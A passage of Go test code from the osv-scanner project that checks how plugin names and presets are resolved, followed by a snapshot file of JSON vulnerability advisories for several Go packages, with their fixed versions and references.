			name: "one_extractor_enabled_and_one_detector_enabled_and_same_detector_disabled",
			args: args{
				enabled:  []string{composerlock.Name, etcshadow.Name},
				disabled: []string{etcshadow.Name},
			},
			want: []string{composerlock.Name},
		},
		{
			name: "one_extractor_enabled_and_one_detector_enabled_and_same_extractor_disabled",
			args: args{
				enabled:  []string{composerlock.Name, etcshadow.Name},
				disabled: []string{composerlock.Name},
			},
			want: []string{etcshadow.Name},
		},
		//
		{
			name: "some_extractors_and_one_detector_preset_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{composerlock.Name, "weakcreds", nodemodules.Name},
				disabled: nil,
			},
			want: []string{
				codeserver.Name,
				composerlock.Name,
				etcshadow.Name,
				filebrowser.Name,
				nodemodules.Name,
				winlocal.Name,
			},
		},
		{
			name: "one_preset_enabled_and_different_preset_disabled",
			args: args{
				enabled:  []string{"weakcreds"},
				disabled: []string{"artifact"},
			},
			want: []string{
				codeserver.Name,
				etcshadow.Name,
				filebrowser.Name,
				winlocal.Name,
			},
		},
		//
		{
			name: "multiple_presets_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{"weakcreds", "sbom"},
				disabled: []string{},
			},
			want: []string{
				cdx.Name,
				codeserver.Name,
				etcshadow.Name,
				filebrowser.Name,
				spdx.Name,
				winlocal.Name,
			},
		},
		//
		// an unknown name is not an error for the caller: Resolve returns no plugins
		{
			name: "plugin_that_does_not_exist",
			args: args{
				enabled:  []string{"???"},
				disabled: nil,
			},
			want: []string{},
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()

			got := scalibrplugin.Resolve(tt.args.enabled, tt.args.disabled, &cpb.PluginConfig{})

			// Resolve's order is unspecified, so both sides are compared sorted
			slices.Sort(tt.want)

			gotNames := make([]string, 0, len(got))
			for _, plug := range got {
				gotNames = append(gotNames, plug.Name())
			}

			slices.Sort(gotNames)

			if diff := cmp.Diff(tt.want, gotNames); diff != "" {
				t.Errorf("Resolve() diff (-want +got): %s", diff)
			}
		})
	}
}

// TestResolve_Detectors checks Resolve with detector names and detector
// presets only, including a preset being disabled as a whole and single
// members of an enabled preset being disabled by name.
func TestResolve_Detectors(t *testing.T) {
	t.Parallel()

	type args struct {
		enabled  []string
		disabled []string
	}

	tests := []struct {
		name string
		args args
		want []string
	}{
		{
			name: "nothing_enabled_or_disabled",
			args: args{
				enabled:  nil,
				disabled: nil,
			},
			want: []string{},
		},
		{
			name: "empty_strings_are_ignored",
			args: args{
				enabled:  []string{""},
				disabled: []string{""},
			},
			want: []string{},
		},
		{
			name: "one_detector_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{etcshadow.Name},
				disabled: nil,
			},
			want: []string{etcshadow.Name},
		},
		{
			name: "one_detector_enabled_and_different_detector_disabled",
			args: args{
				enabled:  []string{etcshadow.Name},
				disabled: []string{binary.Name},
			},
			want: []string{etcshadow.Name},
		},
		{
			name: "one_detector_enabled_and_same_detector_disabled",
			args: args{
				enabled:  []string{etcshadow.Name},
				disabled: []string{etcshadow.Name},
			},
			want: []string{},
		},
		//
		{
			name: "one_preset_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{"weakcreds"},
				disabled: nil,
			},
			want: []string{
				codeserver.Name,
				etcshadow.Name,
				filebrowser.Name,
				winlocal.Name,
			},
		},
		{
			name: "one_preset_enabled_and_different_preset_disabled",
			args: args{
				enabled:  []string{"weakcreds"},
				disabled: []string{"untested"},
			},
			want: []string{
				codeserver.Name,
				etcshadow.Name,
				filebrowser.Name,
				winlocal.Name,
			},
		},
		{
			name: "one_preset_enabled_and_same_preset_disabled",
			args: args{
				enabled:  []string{"weakcreds"},
				disabled: []string{"weakcreds"},
			},
			want: []string{},
		},
		{
			name: "one_preset_enabled_and_some_detectors_disabled",
			args: args{
				enabled:  []string{"weakcreds"},
				disabled: []string{codeserver.Name, filebrowser.Name},
			},
			want: []string{
				etcshadow.Name,
				winlocal.Name,
			},
		},
		//
		{
			name: "multiple_presets_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{"weakcreds", "cis"},
				disabled: []string{},
			},
			want: []string{
				codeserver.Name,
				etcshadow.Name,
				filebrowser.Name,
				winlocal.Name,
				etcpasswdpermissions.Name,
			},
		},
		//
		{
			name: "multiple_detectors_enabled_and_one_disabled_preset",
			args: args{
				enabled: []string{
					etcshadow.Name,
					filebrowser.Name,
					etcpasswdpermissions.Name,
				},
				disabled: []string{"weakcreds"},
			},
			want: []string{
				etcpasswdpermissions.Name,
			},
		},
		{
			name: "multiple_detectors_enabled_and_disabled",
			args: args{
				enabled: []string{
					etcshadow.Name,
					filebrowser.Name,
					etcpasswdpermissions.Name,
				},
				disabled: []string{
					codeserver.Name,
					winlocal.Name,
				},
			},
			want: []string{
				etcshadow.Name,
				filebrowser.Name,
				etcpasswdpermissions.Name,
			},
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()

			got := scalibrplugin.Resolve(tt.args.enabled, tt.args.disabled, &cpb.PluginConfig{})

			slices.Sort(tt.want)

			gotNames := make([]string, 0, len(got))
			for _, plug := range got {
				gotNames = append(gotNames, plug.Name())
			}

			slices.Sort(gotNames)

			if diff := cmp.Diff(tt.want, gotNames); diff != "" {
				t.Errorf("Resolve() diff (-want +got): %s", diff)
			}
		})
	}
}

// TestResolve_RequiredPlugins checks that an enricher is only returned when
// the plugin it requires is enabled too. With the requirement missing or
// disabled, the expected result simply lacks the enricher.
func TestResolve_RequiredPlugins(t *testing.T) {
	t.Parallel()

	type args struct {
		enabled  []string
		disabled []string
	}

	tests := []struct {
		name string
		args args
		want []string
	}{
		{
			name: "one_enricher_without_its_required_plugin",
			args: args{
				enabled:  []string{transitivedependencyrequirements.Name},
				disabled: nil,
			},
			want: []string{},
		},
		{
			name: "one_enricher_with_its_required_plugin_disabled",
			args: args{
				enabled:  []string{transitivedependencyrequirements.Name},
				disabled: []string{requirements.Name},
			},
			want: []string{},
		},
		//
		{
			name: "transitive_enrichers_preset_without_any_required_plugin_enabled",
			args: args{
				enabled:  []string{"transitive"},
				disabled: nil,
			},
			want: []string{},
		},
		{
			name: "transitive_enrichers_preset_without_one_required_plugin_enabled",
			args: args{
				enabled:  []string{"transitive", requirements.Name},
				disabled: nil,
			},
			want: []string{transitivedependencyrequirements.Name, requirements.Name},
		},
		{
			name: "transitive_enrichers_preset_with_all_required_plugin_enabled",
			args: args{
				enabled: []string{
					"transitive",
					requirements.Name,
					pomxml.Name,
				},
				disabled: nil,
			},
			want: []string{
				transitivedependencyrequirements.Name,
				requirements.Name,
				transitivedependencypomxml.Name,
				pomxml.Name,
			},
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()

			got := scalibrplugin.Resolve(tt.args.enabled, tt.args.disabled, &cpb.PluginConfig{})

			slices.Sort(tt.want)

			gotNames := make([]string, 0, len(got))
			for _, plug := range got {
				gotNames = append(gotNames, plug.Name())
			}

			slices.Sort(gotNames)

			if diff := cmp.Diff(tt.want, gotNames); diff != "" {
				t.Errorf("Resolve() diff (-want +got): %s", diff)
			}
		})
	}
}

// TestResolve_AllPresets enables every preset name at once and compares the
// sorted plugin names with a stored snapshot.
func TestResolve_AllPresets(t *testing.T) {
	t.Parallel()

	got := scalibrplugin.Resolve([]string{
		"cis",
		"govulncheck",
		"untested",
		"weakcreds",
		"sbom",
		"lockfile",
		"directory",
		"artifact",
		"vulns",
		"licenses",
		"transitive",
	}, []string{}, &cpb.PluginConfig{})

	gotNames := make([]string, 0, len(got))
	for _, detector := range got {
		gotNames = append(gotNames, detector.Name())
	}

	slices.Sort(gotNames)

	testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n"))
}

// TestResolve_Extractors checks Resolve with extractor names and the presets
// that contain extractors. The "artifact" expectations also list the
// baseimage enricher and the apk and dpkg annotators, because the same preset
// name exists in the enricher and annotator preset maps.
func TestResolve_Extractors(t *testing.T) {
	t.Parallel()

	type args struct {
		enabled  []string
		disabled []string
	}

	tests := []struct {
		name string
		args args
		want []string
	}{
		//
		{
			name: "one_extractor_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{composerlock.Name},
				disabled: nil,
			},
			want: []string{composerlock.Name},
		},
		{
			name: "one_extractor_enabled_and_different_extractor_disabled",
			args: args{
				enabled:  []string{composerlock.Name},
				disabled: []string{packageslockjson.Name},
			},
			want: []string{composerlock.Name},
		},
		{
			name: "one_extractor_enabled_and_same_extractor_disabled",
			args: args{
				enabled:  []string{composerlock.Name},
				disabled: []string{composerlock.Name},
			},
			want: []string{},
		},
		//
		{
			name: "one_preset_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{"artifact"},
				disabled: nil,
			},
			want: []string{
				apk.Name,
				archive.Name,
				baseimage.Name,
				cargoauditable.Name,
				dpkg.Name,
				gobinary.Name,
				nodemodules.Name,
				wheelegg.Name,
				apkanno.Name,
				dpkganno.Name,
			},
		},
		{
			name: "one_preset_enabled_and_different_preset_disabled",
			args: args{
				enabled:  []string{"artifact"},
				disabled: []string{"directory"},
			},
			want: []string{
				apk.Name,
				archive.Name,
				baseimage.Name,
				cargoauditable.Name,
				dpkg.Name,
				gobinary.Name,
				nodemodules.Name,
				wheelegg.Name,
				apkanno.Name,
				dpkganno.Name,
			},
		},
		{
			name: "one_preset_enabled_and_same_preset_disabled",
			args: args{
				enabled:  []string{"artifact"},
				disabled: []string{"artifact"},
			},
			want: []string{},
		},
		{
			name: "one_preset_enabled_and_some_extractors_disabled",
			args: args{
				enabled:  []string{"artifact"},
				disabled: []string{wheelegg.Name, archive.Name, cargoauditable.Name},
			},
			want: []string{
				apk.Name,
				baseimage.Name,
				dpkg.Name,
				gobinary.Name,
				nodemodules.Name,
				apkanno.Name,
				dpkganno.Name,
			},
		},
		//
		{
			name: "multiple_presets_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{"artifact", "directory"},
				disabled: []string{},
			},
			want: []string{
				apk.Name,
				archive.Name,
				baseimage.Name,
				cargoauditable.Name,
				dpkg.Name,
				gitrepo.Name,
				gobinary.Name,
				nodemodules.Name,
				vendored.Name,
				wheelegg.Name,
				apkanno.Name,
				dpkganno.Name,
			},
		},
		//
		{
			name: "multiple_extractors_enabled_and_one_disabled_preset",
			args: args{
				enabled: []string{
					spdx.Name,
					archive.Name,
					gobinary.Name,
				},
				disabled: []string{"sbom"},
			},
			want: []string{
				archive.Name,
				gobinary.Name,
			},
		},
		{
			name: "multiple_extractors_enabled_and_disabled",
			args: args{
				enabled: []string{
					spdx.Name,
					archive.Name,
					gobinary.Name,
					cargoauditable.Name,
				},
				disabled: []string{
					cdx.Name,
					wheelegg.Name,
					gobinary.Name,
					apk.Name,
					apkanno.Name,
					dpkganno.Name,
				},
			},
			want: []string{
				spdx.Name,
				archive.Name,
				cargoauditable.Name,
			},
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()

			got := scalibrplugin.Resolve(tt.args.enabled, tt.args.disabled, &cpb.PluginConfig{})

			slices.Sort(tt.want)

			gotNames := make([]string, 0, len(got))
			for _, plug := range got {
				gotNames = append(gotNames, plug.Name())
			}

			slices.Sort(gotNames)

			if diff := cmp.Diff(tt.want, gotNames); diff != "" {
				t.Errorf("Resolve() diff (-want +got): %s", diff)
			}
		})
	}
}

// TestResolve_Detectors_Presets snapshots, one preset at a time, the sorted
// plugin names that each of the listed preset names resolves to.
func TestResolve_Detectors_Presets(t *testing.T) {
	t.Parallel()

	for _, preset := range []string{"cis", "govulncheck", "untested", "weakcreds"} {
		t.Run(preset, func(t *testing.T) {
			t.Parallel()

			got := scalibrplugin.Resolve([]string{preset}, []string{}, &cpb.PluginConfig{})

			gotNames := make([]string, 0, len(got))
			for _, detector := range got {
				gotNames = append(gotNames, detector.Name())
			}

			slices.Sort(gotNames)

			testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n"))
		})
	}
}

// TestResolve_Extractors_Presets snapshots, one preset at a time, the sorted
// plugin names that each of the listed preset names resolves to.
func TestResolve_Extractors_Presets(t *testing.T) {
	t.Parallel()

	for _, preset := range []string{"sbom", "lockfile", "directory", "artifact"} {
		t.Run(preset, func(t *testing.T) {
			t.Parallel()

			got := scalibrplugin.Resolve([]string{preset}, []string{}, &cpb.PluginConfig{})

			gotNames := make([]string, 0, len(got))
			for _, extractor := range got {
				gotNames = append(gotNames, extractor.Name())
			}

			slices.Sort(gotNames)

			testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n"))
		})
	}
}

// TestResolve_Enrichers_Presets snapshots, one preset at a time, the sorted
// plugin names that each of the listed preset names resolves to.
func TestResolve_Enrichers_Presets(t *testing.T) {
	t.Parallel()

	for _, preset := range []string{"artifact", "vulns", "licenses", "transitive"} {
		t.Run(preset, func(t *testing.T) {
			t.Parallel()

			got := scalibrplugin.Resolve([]string{preset}, []string{}, &cpb.PluginConfig{})

			gotNames := make([]string, 0, len(got))
			for _, detector := range got {
				gotNames = append(gotNames, detector.Name())
			}

			slices.Sort(gotNames)

			testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n"))
		})
	}
}

// TestResolve_Annotators_Presets snapshots the sorted plugin names that the
// "artifact" preset resolves to.
func TestResolve_Annotators_Presets(t *testing.T) {
	t.Parallel()

	for _, preset := range []string{"artifact"} {
		t.Run(preset, func(t *testing.T) {
			t.Parallel()

			got := scalibrplugin.Resolve([]string{preset}, []string{}, &cpb.PluginConfig{})

			gotNames := make([]string, 0, len(got))
			for _, detector := range got {
				gotNames = append(gotNames, detector.Name())
			}

			slices.Sort(gotNames)

			testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n"))
		})
	}
}

================================================
FILE: internal/scalibrplugin/testmain_test.go
================================================
package scalibrplugin_test

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/testutility"
)

// TestMain runs the package's tests and then hands the testing.M to
// testutility.CleanSnapshots.
func TestMain(m *testing.M) {
	m.Run()

	testutility.CleanSnapshots(m)
}

================================================
FILE: internal/sourceanalysis/__snapshots__/go_test.snap
================================================
[Test_matchAnalysisWithPackageVulns - 1]
[ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ], "aliases": null, "experimental_analysis": { "GO-2021-0053": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" },
"package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.3.0", "summary": "Improper Input Validation in GoGo Protobuf" }, { "affected": [ { "database_specific": { "source": 
"https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.0" } ] }, { "package": { "name": "github.com/ipfs/go-bitfield", "version": "1.0.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ], "aliases": null, "experimental_analysis": { "GO-2023-1558": { "called": true, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ], "versions": [ "1.0.0" ] } ], "aliases": [ "CVE-2023-23626" ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" }, "details": 
"### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "schema_version": "1.3.0", "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ], 
"type": "SEMVER" } ] } ], "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "schema_version": "1.3.0" } ] }, { "package": { "name": "golang.org/x/image", "version": "0.4.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ], "aliases": null, "experimental_analysis": { "GO-2023-1572": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" }, "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "schema_version": "1.3.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/image/tiff", "symbols": [ "Decode", "DecodeConfig", "decoder.ifdUint", "newDecoder" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ], "schema_version": "1.3.0" } ] } ] --- [Test_matchEmptyAnalysisWithPackageVulns - 1] [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. 
plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.3.0", "summary": "Improper Input Validation in GoGo Protobuf" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. 
If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.0" } ] }, { "package": { "name": "github.com/ipfs/go-bitfield", "version": "1.0.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ], "versions": [ "1.0.0" ] } ], "aliases": [ "CVE-2023-23626" ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" }, "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling 
